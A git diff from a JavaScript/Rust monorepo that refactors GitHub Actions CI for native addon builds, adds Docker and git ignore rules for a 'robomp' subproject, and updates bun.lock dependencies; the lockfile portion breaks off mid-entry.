diff --git a/.dockerignore b/.dockerignore index b52fc61c3..55bbc1f73 100644 --- a/.dockerignore +++ b/.dockerignore @@ -53,6 +53,13 @@ packages/natives/native/pi_natives.dev.node packages/ai/test/.temp-images/ python/omp-rpc/src/omp_rpc.egg-info/ +# robomp runtime state — robomp has its own Dockerfile/build context; +# keep these out of the monorepo image too. +python/robomp/data/ +python/robomp/.cache/ +python/robomp/src/robomp/static/ +python/robomp/web/dist/ + # Scratch files the repo creates ad-hoc. syntax.jsonl out.jsonl diff --git a/.fallowrc.jsonc b/.fallowrc.jsonc index 7672cb8ae..5f4fc8844 100644 --- a/.fallowrc.jsonc +++ b/.fallowrc.jsonc @@ -12,6 +12,10 @@ "packages/*/bench/**/*.{ts,tsx}", "packages/*/scripts/**/*.ts" ], + "ignoreDependencies": [ + // Used via `node_modules/.bin/napi` from packages/natives/scripts/build-native.ts. + "@napi-rs/cli" + ], "duplicates": { "ignore": [ // Generated from `packages/natives/scripts/native-index.template.js` via gen-enums.ts. diff --git a/.github/actions/build-native/action.yml b/.github/actions/build-native/action.yml new file mode 100644 index 000000000..66801acb1 --- /dev/null +++ b/.github/actions/build-native/action.yml @@ -0,0 +1,96 @@ +name: Build native addon +description: Build the pi_natives cdylib for one platform/arch/variant and upload it as a hash-tagged artifact. + +inputs: + hash: + description: Rust source hash used in the artifact name + required: true + platform: + description: Target platform (linux, darwin, win32) + required: true + arch: + description: Target arch (x64, arm64) + required: true + variant: + description: Optional build variant (baseline, modern) + required: false + default: "" + target: + description: Optional rustc target triple for cross-compilation + required: false + default: "" + rust_checks: + description: Run clippy/rustfmt checks (only one matrix entry should set this) + required: false + default: "false" + save_cache: + description: Whether Swatinem/rust-cache should write a cache entry + required: false + default: "false" + +runs: + using: composite + steps: + - uses: dtolnay/rust-toolchain@nightly + with: + toolchain: nightly-2026-04-29 + components: ${{ inputs.rust_checks == 'true' && 'clippy, rustfmt' || '' }} + targets: ${{ inputs.target }} + - name: Prepend rustup toolchain bin to PATH + shell: bash + run: | + # Homebrew on macOS runners ships rustup-init with shadow proxies + # for `cargo`/`rustc`/etc. that error out as the installer + # ("unexpected argument 'metadata' found"). Force the real + # toolchain binaries to win on PATH. + toolchain_bin="$(dirname "$(rustup which cargo)")" + echo "$toolchain_bin" >> "$GITHUB_PATH" + echo "Prepended $toolchain_bin to PATH" + - uses: Swatinem/rust-cache@v2 + with: + shared-key: native-${{ inputs.platform }}-${{ inputs.arch }}-${{ inputs.variant || 'default' }} + cache-on-failure: true + save-if: ${{ inputs.save_cache == 'true' }} + cache-workspace-crates: true + - uses: taiki-e/install-action@v2 + if: inputs.target == '' + with: + tool: nextest + - uses: oven-sh/setup-bun@v2 + with: + bun-version: "1.3" + - shell: bash + run: bun install --frozen-lockfile + - name: Install cross-compilation toolchain + if: inputs.target == 'aarch64-unknown-linux-gnu' + shell: bash + run: | + sudo apt-get update + sudo apt-get install -y gcc-aarch64-linux-gnu + - name: Rust checks + if: inputs.rust_checks == 'true' + shell: bash + run: bun run check:rs + - name: Test workspace (Rust) + if: inputs.target == '' + shell: bash + run: bun run test:rs + - name: Build native addon(s) + shell: bash + env: + CROSS_TARGET: ${{ inputs.target }} + TARGET_PLATFORM: ${{ inputs.platform }} + TARGET_ARCH: ${{ inputs.arch }} + TARGET_VARIANTS: ${{ inputs.variant }} + CARGO_TARGET_AARCH64_UNKNOWN_LINUX_GNU_LINKER: aarch64-linux-gnu-gcc + run: bun run ci:build:native + - name: Upload native addon(s) + uses: actions/upload-artifact@v4 + with: + name: pi-natives-${{ inputs.platform }}-${{ inputs.arch }}${{ inputs.variant && format('-{0}', inputs.variant) || '' }}-h${{ inputs.hash }} + path: packages/natives/native/pi_natives.${{ inputs.platform }}-${{ inputs.arch }}*.node + if-no-files-found: error + # Explicit so the rust-hash canary lookup keeps working even if org + # defaults shift; bump if Rust source ever stays stable for >90 days + # of main pushes and you want to avoid rebuilds. + retention-days: 90 diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 3b5ab6b3f..21b641fc7 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -19,9 +19,11 @@ concurrency: jobs: # Compute a stable hash of every input that affects the native cdylib output, - # then look for a prior successful main build that already produced artifacts - # with this hash. If found, downstream consumers reuse those artifacts and - # the native job is skipped entirely. + # then look for any prior successful main run that already uploaded the linux-x64 + # artifacts for this hash. If found, test jobs reuse those artifacts instead of + # rebuilding them on non-release commits. The non-tag native_linux job is skipped + # in that case, so the canary's retention window (see build-native action) is the + # effective TTL of a cache hit before main rebuilds anyway. rust-hash: runs-on: ubuntu-22.04 outputs: @@ -50,8 +52,9 @@ jobs: shell: bash run: | hash="${{ steps.compute.outputs.hash }}" - # Canary artifact: main always builds linux-x64-modern, so its presence - # implies the run has the full multi-platform set we need. + # Canary artifact: native_linux builds baseline + modern together, + # so the modern artifact's presence on any prior main run implies + # both linux x64 test artifacts are cached and downloadable. canary="pi-natives-linux-x64-modern-h${hash}" run_id="" for candidate in $(gh run list \ @@ -88,98 +91,57 @@ jobs: - name: Type check workspace run: bun run ci:check:full - native: + # Linux x64 baseline + modern: required by `test`, so it runs on every PR + # unless rust-hash found a cached run. Tags always rebuild for fresh artifacts. + native_linux: needs: [rust-hash] - if: ${{ needs.rust-hash.outputs.run-id == '' }} + if: ${{ startsWith(github.ref, 'refs/tags/v') || needs.rust-hash.outputs.run-id == '' }} + runs-on: ubuntu-22.04 strategy: fail-fast: false matrix: - # Tag and main pushes build the full multi-platform set (so the cache - # has every artifact a future tag could need). PRs only build linux-x64. - include: ${{ (startsWith(github.ref, 'refs/tags/v') || github.ref == - 'refs/heads/main') && fromJSON('[ - {"os":"ubuntu-22.04","platform":"linux","arch":"x64","variant":"baseline","rust_checks":true}, - {"os":"ubuntu-22.04","platform":"linux","arch":"x64","variant":"modern"}, - {"os":"ubuntu-22.04","platform":"linux","arch":"arm64","target":"aarch64-unknown-linux-gnu"}, - {"os":"macos-15-intel","platform":"darwin","arch":"x64","variant":"baseline"}, - {"os":"macos-14","platform":"darwin","arch":"arm64"}, - {"os":"windows-latest","platform":"win32","arch":"x64","variant":"baseline"} - ]') || fromJSON('[ - {"os":"ubuntu-22.04","platform":"linux","arch":"x64","variant":"baseline","rust_checks":true}, - {"os":"ubuntu-22.04","platform":"linux","arch":"x64","variant":"modern"} - ]') }} + include: + - { variant: baseline, rust_checks: true } + - { variant: modern } + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/build-native + with: + hash: ${{ needs.rust-hash.outputs.hash }} + platform: linux + arch: x64 + variant: ${{ matrix.variant }} + rust_checks: ${{ matrix.rust_checks && 'true' || 'false' }} + save_cache: ${{ github.event_name == 'push' && (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/tags/v')) }} + + # Remaining platforms only ship in release tags; PRs and main never build them. + native_release: + needs: [rust-hash] + if: ${{ startsWith(github.ref, 'refs/tags/v') }} + strategy: + fail-fast: false + matrix: + include: + - { os: ubuntu-22.04, platform: linux, arch: arm64, target: aarch64-unknown-linux-gnu } + - { os: macos-15-intel, platform: darwin, arch: x64, variant: baseline } + - { os: macos-14, platform: darwin, arch: arm64 } + - { os: windows-latest, platform: win32, arch: x64, variant: baseline } runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@v4 - - uses: dtolnay/rust-toolchain@nightly + - uses: ./.github/actions/build-native with: - toolchain: nightly-2026-04-29 - components: ${{ matrix.rust_checks && 'clippy, rustfmt' || '' }} - targets: ${{ matrix.target }} - - name: Ensure cross-compilation target is installed - if: matrix.target - run: rustup target add ${{ matrix.target }} - - name: Prepend rustup toolchain bin to PATH - shell: bash - run: | - # Homebrew on macOS runners ships rustup-init with shadow proxies - # for `cargo`/`rustc`/etc. that error out as the installer - # ("unexpected argument 'metadata' found"). Force the real - # toolchain binaries to win on PATH. - toolchain_bin="$(dirname "$(rustup which cargo)")" - echo "$toolchain_bin" >> "$GITHUB_PATH" - echo "Prepended $toolchain_bin to PATH" - - uses: Swatinem/rust-cache@v2 - with: - shared-key: native-${{ matrix.platform }}-${{ matrix.arch }}-${{ matrix.variant - || 'default' }} - cache-on-failure: true - save-if: ${{ github.event_name == 'push' && (github.ref == 'refs/heads/main' || - startsWith(github.ref, 'refs/tags/v')) }} - cache-workspace-crates: true - - uses: taiki-e/install-action@v2 - if: ${{ !matrix.target }} - with: - tool: nextest - - uses: oven-sh/setup-bun@v2 - with: - bun-version: "1.3" - - run: bun install --frozen-lockfile - - name: Install cross-compilation toolchain - if: matrix.target == 'aarch64-unknown-linux-gnu' - run: | - sudo apt-get update - sudo apt-get install -y gcc-aarch64-linux-gnu - - name: Rust checks - if: matrix.rust_checks - run: bun run check:rs - - name: Test workspace (Rust) - if: ${{ !matrix.target }} - run: bun run test:rs - - name: Build native addon(s) - env: - CROSS_TARGET: ${{ matrix.target }} - TARGET_PLATFORM: ${{ matrix.platform }} - TARGET_ARCH: ${{ matrix.arch }} - TARGET_VARIANTS: ${{ matrix.variant }} - CARGO_TARGET_AARCH64_UNKNOWN_LINUX_GNU_LINKER: aarch64-linux-gnu-gcc - shell: bash - run: | - bun run ci:build:native - - name: Upload native addon(s) - uses: actions/upload-artifact@v4 - with: - name: pi-natives-${{ matrix.platform }}-${{ matrix.arch }}${{ matrix.variant && - format('-{0}', matrix.variant) || '' }}-h${{ - needs.rust-hash.outputs.hash }} - path: packages/natives/native/pi_natives.${{ matrix.platform }}-${{ matrix.arch - }}*.node - if-no-files-found: error + hash: ${{ needs.rust-hash.outputs.hash }} + platform: ${{ matrix.platform }} + arch: ${{ matrix.arch }} + variant: ${{ matrix.variant }} + target: ${{ matrix.target }} + save_cache: ${{ github.event_name == 'push' && (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/tags/v')) }} test: runs-on: ubuntu-22.04 - needs: [native, rust-hash] - if: ${{ !cancelled() && needs.native.result != 'failure' }} + needs: [native_linux, rust-hash] + if: ${{ !cancelled() && needs.native_linux.result != 'failure' }} timeout-minutes: 30 steps: - uses: actions/checkout@v4 @@ -202,7 +164,7 @@ jobs: id: source shell: bash run: | - if [ "${{ needs.native.result }}" = "success" ]; then + if [ "${{ needs.native_linux.result }}" = "success" ]; then echo "run-id=${{ github.run_id }}" >> "$GITHUB_OUTPUT" else echo "run-id=${{ needs.rust-hash.outputs.run-id }}" >> "$GITHUB_OUTPUT" @@ -254,10 +216,10 @@ jobs: release_binary: if: ${{ startsWith(github.ref, 'refs/tags/v') && !cancelled() && - needs.native.result != 'failure' && needs.test.result == 'success' && - needs.check.result == 'success' && needs.install_methods.result == - 'success' }} - needs: [check, native, test, install_methods, rust-hash] + needs.native_linux.result == 'success' && needs.native_release.result == + 'success' && needs.test.result == 'success' && needs.check.result == + 'success' && needs.install_methods.result == 'success' }} + needs: [check, native_linux, native_release, test, install_methods, rust-hash] strategy: fail-fast: false matrix: @@ -311,24 +273,12 @@ jobs: path: ~/.bun/install/cache key: bun-${{ runner.os }}-${{ hashFiles('**/bun.lock') }} - run: bun install --frozen-lockfile - - name: Resolve native source run - id: source - shell: bash - run: | - if [ "${{ needs.native.result }}" = "success" ]; then - echo "run-id=${{ github.run_id }}" >> "$GITHUB_OUTPUT" - else - echo "run-id=${{ needs.rust-hash.outputs.run-id }}" >> "$GITHUB_OUTPUT" - fi - name: Download native addon(s) uses: actions/download-artifact@v4 with: - pattern: pi-natives-${{ matrix.platform }}-${{ matrix.arch }}*-h${{ - needs.rust-hash.outputs.hash }} + pattern: pi-natives-${{ matrix.platform }}-${{ matrix.arch }}*-h${{ needs.rust-hash.outputs.hash }} path: packages/natives/native merge-multiple: true - run-id: ${{ steps.source.outputs.run-id }} - github-token: ${{ secrets.GITHUB_TOKEN }} - name: Build release binary env: RELEASE_TARGETS: ${{ matrix.target_id }} @@ -378,7 +328,7 @@ jobs: release-npm: if: ${{ startsWith(github.ref, 'refs/tags/v') && !cancelled() && needs.release_binary.result == 'success' && !inputs.skip_npm }} - needs: [release_binary, native, rust-hash] + needs: [release_binary, rust-hash] runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 @@ -395,23 +345,12 @@ jobs: path: ~/.bun/install/cache key: bun-${{ runner.os }}-${{ hashFiles('**/bun.lock') }} - run: bun install --frozen-lockfile - - name: Resolve native source run - id: source - shell: bash - run: | - if [ "${{ needs.native.result }}" = "success" ]; then - echo "run-id=${{ github.run_id }}" >> "$GITHUB_OUTPUT" - else - echo "run-id=${{ needs.rust-hash.outputs.run-id }}" >> "$GITHUB_OUTPUT" - fi - name: Download native addons uses: actions/download-artifact@v4 with: pattern: pi-natives-*-h${{ needs.rust-hash.outputs.hash }} path: packages/natives/native merge-multiple: true - run-id: ${{ steps.source.outputs.run-id }} - github-token: ${{ secrets.GITHUB_TOKEN }} - name: Publish to npm env: NPM_CONFIG_TOKEN: ${{ secrets.NPM_TOKEN }} diff --git a/.gitignore b/.gitignore index bf283ba5f..fd2add32e 100644 --- a/.gitignore +++ b/.gitignore @@ -62,3 +62,10 @@ python/omp-rpc/src/omp_rpc.egg-info/ .wt/ CPU*.md packages/coding-agent/binaries/ + +# robomp runtime state +python/robomp/data/ +python/robomp/.cache/ +python/robomp/src/robomp/static/ +python/robomp/web/dist/ +python/robomp/.env diff --git a/Dockerfile b/Dockerfile index 222184503..5193334c1 100644 --- a/Dockerfile +++ b/Dockerfile @@ -52,6 +52,7 @@ COPY --parents \ Cargo.toml Cargo.lock rust-toolchain.toml \ packages/*/package.json \ packages/tsconfig.workspace.json \ + python/robomp/web/package.json \ crates/*/Cargo.toml \ /pi/ diff --git a/Dockerfile.dockerignore b/Dockerfile.dockerignore new file mode 100644 index 000000000..a60e23cb8 --- /dev/null +++ b/Dockerfile.dockerignore @@ -0,0 +1,79 @@ +# Pi-artifacts build context (this file shadows `.dockerignore` only for the +# pi-root `Dockerfile`). Robomp builds with `dockerfile: python/robomp/Dockerfile` +# still fall back to the shared `.dockerignore` next door because they don't +# have their own ignore file. +# +# Keep this file in sync with `.dockerignore` for the shared rules; everything +# below the divider is the artifacts-only addendum. + +# ─── Shared with .dockerignore ──────────────────────────────────────────────── + +# Heavy build outputs — must never reach the build context. `target/` alone is +# >100 GB on a dev machine. +target/ +node_modules/ +dist/ +runs/ + +# Per-host scratch the pi codebase uses for parallel agents / worktrees. +.fallow/ +.worktrees/ +.wt/ +.opencode/ +.pi_config/ +.omp/plugins/ + +# VCS, editors, IDEs — irrelevant to the build, churn on every IDE keystroke. +.git/ +.npm/ +.vscode/ +.zed/ +.idea/ + +# OS + transient noise. +.DS_Store +*.swp +*.swo +*~ +*.tmp + +# Logs + profiling artifacts. +*.log +*.cpuprofile +*.heapprofile +*.heapsnapshot +CPU.* + +# Build / test side outputs. +*.tsbuildinfo +coverage/ +.nyc_output/ +__pycache__/ +compaction-results/ +changes/ + +# Generated files (the in-image build regenerates them). +packages/coding-agent/src/internal-urls/docs-index.generated.ts +packages/natives/native/.build/ +packages/natives/native/pi_natives.darwin-*.node +packages/natives/native/pi_natives.dev.node +packages/ai/test/.temp-images/ +python/omp-rpc/src/omp_rpc.egg-info/ + +# Scratch files the repo creates ad-hoc. +syntax.jsonl +out.jsonl +out.html +pi-*.html + +# Secrets. Should never be in the image regardless. +.env + +# ─── Pi-artifacts only ──────────────────────────────────────────────────────── +# Robomp's source tree is unused by the artifacts image — pi-natives + omp-rpc +# are the only outputs, and `python/omp-rpc/` is reached explicitly by the +# python-builder stage (`COPY python/omp-rpc /src`). Everything under +# `python/robomp/` (orchestrator source, web bundle, tests, container scripts) +# would otherwise be transferred as part of the `COPY . /pi/` layer and bake +# uselessly into the natives-builder cache. +python/robomp/ diff --git a/bun.lock b/bun.lock index ffa5b51b7..77f0d212f 100644 --- a/bun.lock +++ b/bun.lock @@ -36,16 +36,10 @@ }, "dependencies": { "@anthropic-ai/sdk": "catalog:", - "@aws-sdk/client-bedrock-runtime": "catalog:", - "@aws-sdk/credential-provider-node": "catalog:", "@bufbuild/protobuf": "catalog:", - "@google/genai": "catalog:", - "@oh-my-pi/pi-natives": "catalog:", "@oh-my-pi/pi-utils": "catalog:", - "@smithy/node-http-handler": "catalog:", "openai": "catalog:", "partial-json": "catalog:", - "proxy-agent": "catalog:", "zod": "catalog:", }, "devDependencies": { @@ -180,22 +174,35 @@ "name": "@oh-my-pi/pi-utils", "version": "15.1.2", "dependencies": { + "@oh-my-pi/pi-natives": "catalog:", "beautiful-mermaid": "catalog:", "handlebars": "catalog:", "winston": "catalog:", "winston-daily-rotate-file": "catalog:", }, "devDependencies": { - "@oh-my-pi/pi-natives": "catalog:", "@types/bun": "catalog:", }, }, + "python/robomp/web": { + "name": "robomp-web", + "version": "0.1.0", + "dependencies": { + "solid-js": "catalog:", + }, + "devDependencies": { + "@tailwindcss/vite": "catalog:", + "@types/bun": "catalog:", + "tailwindcss": "catalog:", + "typescript": "^5.7.3", + "vite": "catalog:", + "vite-plugin-solid": "catalog:", + }, + }, }, "catalog": { "@agentclientprotocol/sdk": "0.21.0", "@anthropic-ai/sdk": "^0.94.0", - "@aws-sdk/client-bedrock-runtime": "^3.1043.0", - "@aws-sdk/credential-provider-node": "^3.972.39", "@babel/generator": "^7.29.1", "@babel/parser": "^7.29.3", "@babel/traverse": "^7.29.0", @@ -203,7 +210,6 @@ "@biomejs/biome": "^2.4.14", "@bufbuild/protobuf": "^2.12.0", "@bufbuild/protoc-gen-es": "^2.12.0", - "@google/genai": "^1.52.0", "@mozilla/readability": "^0.6.0", "@napi-rs/cli": "3.6.2", "@oh-my-pi/omp-stats": "15.1.2", @@ -217,8 +223,8 @@ "@opentelemetry/context-async-hooks": "^2.0.0", "@opentelemetry/sdk-trace-base": "^2.0.0", "@puppeteer/browsers": "^2.13.0", - "@smithy/node-http-handler": "^4.6.1", "@tailwindcss/node": "^4.2.4", + "@tailwindcss/vite": "^4.2.4", "@types/babel__generator": "^7.27.0", "@types/babel__traverse": "^7.28.0", "@types/bun": "^1.3.14", @@ -244,16 +250,18 @@ "partial-json": "^0.1.7", "postcss": "^8.5.14", "prettier": "^3.8.3", - "proxy-agent": "^8.0.1", "puppeteer-core": "^24.42.0", "react": "19.2.5", "react-chartjs-2": "^5.3.1", "react-dom": "19.2.5", "regexp-tree": "^0.1.27", + "solid-js": "^1.9.12", "tailwindcss": "^4.2.4", "turndown": "7.2.4", "turndown-plugin-gfm": "1.0.2", "typescript": "^6.0.3", + "vite": "^5.4.14", + "vite-plugin-solid": "^2.11.6", "winston": "^3.19.0", "winston-daily-rotate-file": "^5.0.0", "zod": "4.4.3", @@ -263,90 +271,36 @@ "@anthropic-ai/sdk": ["@anthropic-ai/sdk@0.94.0", "", { "dependencies": { "json-schema-to-ts": "^3.1.1" }, "peerDependencies": { "zod": "^3.25.0 || ^4.0.0" }, "optionalPeers": ["zod"], "bin": { "anthropic-ai-sdk": "bin/cli" } }, "sha512-OVlCttk5MyeTGtrWX5+F3MJOfEMDuEjK8+rm9aQMDfRPWndVMbhk37QG8WLnVbcc7huyUGngVMjT7iMN2llySA=="], - "@aws-crypto/crc32": ["@aws-crypto/crc32@5.2.0", "", { "dependencies": { "@aws-crypto/util": "^5.2.0", "@aws-sdk/types": "^3.222.0", "tslib": "^2.6.2" } }, "sha512-nLbCWqQNgUiwwtFsen1AdzAtvuLRsQS8rYgMuxCrdKf9kOssamGLuPwyTY9wyYblNr9+1XM8v6zoDTPPSIeANg=="], - - "@aws-crypto/sha256-browser": ["@aws-crypto/sha256-browser@5.2.0", "", { "dependencies": { "@aws-crypto/sha256-js": "^5.2.0", "@aws-crypto/supports-web-crypto": "^5.2.0", "@aws-crypto/util": "^5.2.0", "@aws-sdk/types": "^3.222.0", "@aws-sdk/util-locate-window": "^3.0.0", "@smithy/util-utf8": "^2.0.0", "tslib": "^2.6.2" } }, "sha512-AXfN/lGotSQwu6HNcEsIASo7kWXZ5HYWvfOmSNKDsEqC4OashTp8alTmaz+F7TC2L083SFv5RdB+qU3Vs1kZqw=="], - - "@aws-crypto/sha256-js": ["@aws-crypto/sha256-js@5.2.0", "", { "dependencies": { "@aws-crypto/util": "^5.2.0", "@aws-sdk/types": "^3.222.0", "tslib": "^2.6.2" } }, "sha512-FFQQyu7edu4ufvIZ+OadFpHHOt+eSTBaYaki44c+akjg7qZg9oOQeLlk77F6tSYqjDAFClrHJk9tMf0HdVyOvA=="], - - "@aws-crypto/supports-web-crypto": ["@aws-crypto/supports-web-crypto@5.2.0", "", { "dependencies": { "tslib": "^2.6.2" } }, "sha512-iAvUotm021kM33eCdNfwIN//F77/IADDSs58i+MDaOqFrVjZo9bAal0NK7HurRuWLLpF1iLX7gbWrjHjeo+YFg=="], - - "@aws-crypto/util": ["@aws-crypto/util@5.2.0", "", { "dependencies": { "@aws-sdk/types": "^3.222.0", "@smithy/util-utf8": "^2.0.0", "tslib": "^2.6.2" } }, "sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ=="], - - "@aws-sdk/client-bedrock-runtime": ["@aws-sdk/client-bedrock-runtime@3.1045.0", "", { "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", "@aws-sdk/core": "^3.974.8", "@aws-sdk/credential-provider-node": "^3.972.39", "@aws-sdk/eventstream-handler-node": "^3.972.14", "@aws-sdk/middleware-eventstream": "^3.972.10", "@aws-sdk/middleware-host-header": "^3.972.10", "@aws-sdk/middleware-logger": "^3.972.10", "@aws-sdk/middleware-recursion-detection": "^3.972.11", "@aws-sdk/middleware-user-agent": "^3.972.38", "@aws-sdk/middleware-websocket": "^3.972.16", "@aws-sdk/region-config-resolver": "^3.972.13", "@aws-sdk/token-providers": "3.1045.0", "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-endpoints": "^3.996.8", "@aws-sdk/util-user-agent-browser": "^3.972.10", "@aws-sdk/util-user-agent-node": "^3.973.24", "@smithy/config-resolver": "^4.4.17", "@smithy/core": "^3.23.17", "@smithy/eventstream-serde-browser": "^4.2.14", "@smithy/eventstream-serde-config-resolver": "^4.3.14", "@smithy/eventstream-serde-node": "^4.2.14", "@smithy/fetch-http-handler": "^5.3.17", "@smithy/hash-node": "^4.2.14", "@smithy/invalid-dependency": "^4.2.14", "@smithy/middleware-content-length": "^4.2.14", "@smithy/middleware-endpoint": "^4.4.32", "@smithy/middleware-retry": "^4.5.7", "@smithy/middleware-serde": "^4.2.20", "@smithy/middleware-stack": "^4.2.14", "@smithy/node-config-provider": "^4.3.14", "@smithy/node-http-handler": "^4.6.1", "@smithy/protocol-http": "^5.3.14", "@smithy/smithy-client": "^4.12.13", "@smithy/types": "^4.14.1", "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", "@smithy/util-defaults-mode-browser": "^4.3.49", "@smithy/util-defaults-mode-node": "^4.2.54", "@smithy/util-endpoints": "^3.4.2", "@smithy/util-middleware": "^4.2.14", "@smithy/util-retry": "^4.3.6", "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" } }, "sha512-aPC6gAz9uKRiwfnKB7peTs6yD0FpSzmVnSkx0f2QtJfosFM6J6KtBvR1lMKby050K4C4PAyEScwA5YTsGfTcGA=="], - - "@aws-sdk/core": ["@aws-sdk/core@3.974.8", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@aws-sdk/xml-builder": "^3.972.22", "@smithy/core": "^3.23.17", "@smithy/node-config-provider": "^4.3.14", "@smithy/property-provider": "^4.2.14", "@smithy/protocol-http": "^5.3.14", "@smithy/signature-v4": "^5.3.14", "@smithy/smithy-client": "^4.12.13", "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "@smithy/util-middleware": "^4.2.14", "@smithy/util-retry": "^4.3.6", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" } }, "sha512-njR2qoG6ZuB0kvAS2FyICsFZJ6gmCcf2X/7JcD14sUvGDm26wiZ5BrA6LOiUxKFEF+IVe7kdroxyE00YlkiYsw=="], - - "@aws-sdk/credential-provider-env": ["@aws-sdk/credential-provider-env@3.972.34", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-XT0jtf8Fw9JE6ppsQeoNnZRiG+jqRixMT1v1ZR17G60UvVdsQmTG8nbEyHuEPfMxDXEhfdARaM/XiEhca4lGHQ=="], - - "@aws-sdk/credential-provider-http": ["@aws-sdk/credential-provider-http@3.972.36", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/types": "^3.973.8", "@smithy/fetch-http-handler": "^5.3.17", "@smithy/node-http-handler": "^4.6.1", "@smithy/property-provider": "^4.2.14", "@smithy/protocol-http": "^5.3.14", "@smithy/smithy-client": "^4.12.13", "@smithy/types": "^4.14.1", "@smithy/util-stream": "^4.5.25", "tslib": "^2.6.2" } }, "sha512-DPoGWfy7J7RKxvbf5kOKIGQkD2ek3dbKgzKIGrnLuvZBz5myU+Im/H6pmc14QcnFbqHMqxvtWSgRDSJW3qXLQg=="], - - "@aws-sdk/credential-provider-ini": ["@aws-sdk/credential-provider-ini@3.972.38", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/credential-provider-env": "^3.972.34", "@aws-sdk/credential-provider-http": "^3.972.36", "@aws-sdk/credential-provider-login": "^3.972.38", "@aws-sdk/credential-provider-process": "^3.972.34", "@aws-sdk/credential-provider-sso": "^3.972.38", "@aws-sdk/credential-provider-web-identity": "^3.972.38", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/types": "^3.973.8", "@smithy/credential-provider-imds": "^4.2.14", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-oDzUBu2MGJFgoar05sPMCwSrhw44ASyccrHzj66vO69OZqi7I6hZZxXfuPLC8OCzW7C+sU+bI73XHij41yekgQ=="], - - "@aws-sdk/credential-provider-login": ["@aws-sdk/credential-provider-login@3.972.38", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/protocol-http": "^5.3.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-g1NosS8qe4OF++G2UFCM5ovSkgipC7YYor5KCWatG0UoMSO5YFj9C8muePlyVmOBV/WTI16Jo3/s1NUo/o1Bww=="], - - "@aws-sdk/credential-provider-node": ["@aws-sdk/credential-provider-node@3.972.39", "", { "dependencies": { "@aws-sdk/credential-provider-env": "^3.972.34", "@aws-sdk/credential-provider-http": "^3.972.36", "@aws-sdk/credential-provider-ini": "^3.972.38", "@aws-sdk/credential-provider-process": "^3.972.34", "@aws-sdk/credential-provider-sso": "^3.972.38", "@aws-sdk/credential-provider-web-identity": "^3.972.38", "@aws-sdk/types": "^3.973.8", "@smithy/credential-provider-imds": "^4.2.14", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-HEswDQyxUtadoZ/bJsPPENHg7R0Lzym5LuMksJeHvqhCOpP+rtkDLKI4/ZChH4w3cf5kG8n6bZuI8PzajoiqMg=="], - - "@aws-sdk/credential-provider-process": ["@aws-sdk/credential-provider-process@3.972.34", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-T3IFs4EVmVi1dVN5RciFnklCANSzvrQd/VuHY9ThHSQmYkTogjcGkoJEr+oNUPQZnso52183088NqysMPji1/Q=="], - - "@aws-sdk/credential-provider-sso": ["@aws-sdk/credential-provider-sso@3.972.38", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/token-providers": "3.1041.0", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-5ZxG+t0+3Q3QPh8KEjX6syskhgNf7I0MN7oGioTf6Lm1NTjfP7sIcYGNsthXC2qR8vcD3edNZwCr2ovfSSWuRA=="], - - "@aws-sdk/credential-provider-web-identity": ["@aws-sdk/credential-provider-web-identity@3.972.38", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-lYHFF30DGI20jZcYX8cm6Ns0V7f1dDN6g/MBDLTyD/5iw+bXs3yBr2iAiHDkx4RFU5JgsnZvCHYKiRVPRdmOgw=="], - - "@aws-sdk/eventstream-handler-node": ["@aws-sdk/eventstream-handler-node@3.972.14", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/eventstream-codec": "^4.2.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, 